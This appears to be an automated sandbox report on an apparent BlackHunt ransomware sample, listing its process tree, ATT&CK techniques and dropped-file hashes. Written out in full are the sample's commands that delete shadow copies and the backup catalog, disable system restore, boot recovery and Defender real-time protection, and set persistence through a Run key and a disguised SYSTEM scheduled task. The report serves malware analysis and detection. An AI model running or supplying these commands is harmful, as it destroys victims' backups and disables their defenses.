C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2156
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe" /F2⤵PID:1344
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe" /F3⤵
- Creates scheduled task(s)
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2340
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2452
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:612
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2068
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:572
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2540
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2396
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1348
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2820
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2324
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2844
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1368
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2556
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5860120d41a85e936bf4bf901d7b9780d
SHA1488035009dd7d661a7ec6f19b471f0b09ea618f6
SHA256ea80f576a664f6ee82536a61e416e074e2a5bd2e656b4b2a5a79289d4c8d1e7b
SHA512828d71ab356e0b67a07ffd9c4d4501a21c5499149df7b9cb47903c806eac5a60856956a9a6c41c40c5b8870cadc6508e167809000292bc0c823f90b82ae0eb8f
-
Filesize
684B
MD5bc4a578d88f9930fb16d90a959da5d4e
SHA10b28669019379f13dedfda28413349578701053c
SHA2561a8a30fb962e1dfa82e085b9c735f9f631b52c50717c779684cdeea5bca5e938
SHA512997ab57bc18ac947f4499e5f89f38c4f18467cefc067941a8aba164f641a825d8e2eb2744a920d9bfa9a579435adc16b71ed33abfb6baeddca3b2164be94246e
-
Filesize
1KB
MD5fa17164c02a988502676bdb5c900f15d
SHA1ef51ef5b36d1b97e39ac4511eaa97a6f9cce8570
SHA256fa56b239c1372b70afb22f031878928a84d7abc3a0e1110d433eee87a5cc4209
SHA51227226e361eea4a814ab45b73450c942e13e76dcf321826f164b71e9fddbd37624406d8a811e273ae67c32820b5c0773694dfd7c4b3936dbca065442396cfbe5c